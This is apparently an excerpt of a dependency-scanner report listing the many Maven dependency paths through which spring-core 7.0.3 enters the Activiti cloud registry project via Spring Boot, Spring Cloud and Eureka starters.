  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jetty-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-jackson@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-servlet@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-actuator@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jetty-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-jackson@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-servlet@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jetty-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.glassfish.hk2:spring-bridge@3.1.1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 org.springframework.boot:spring-boot-jackson2@4.0.2 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-freemarker@4.0.2 org.springframework.boot:spring-boot-freemarker@4.0.2 org.springframework:spring-context-support@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.boot:spring-boot-starter-cache@4.0.2 org.springframework.boot:spring-boot-cache@4.0.2 org.springframework:spring-context-support@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-health@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-freemarker@4.0.2 org.springframework.boot:spring-boot-freemarker@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 org.springframework.boot:spring-boot-jackson2@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.boot:spring-boot-starter-cache@4.0.2 org.springframework.boot:spring-boot-cache@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-freemarker@4.0.2 org.springframework.boot:spring-boot-freemarker@4.0.2 org.springframework:spring-context-support@7.0.3 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.boot:spring-boot-starter-cache@4.0.2 org.springframework.boot:spring-boot-cache@4.0.2 org.springframework:spring-context-support@7.0.3 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-actuator@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-freemarker@4.0.2 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.boot:spring-boot-starter-cache@4.0.2 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-jackson@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-servlet@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-servlet@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
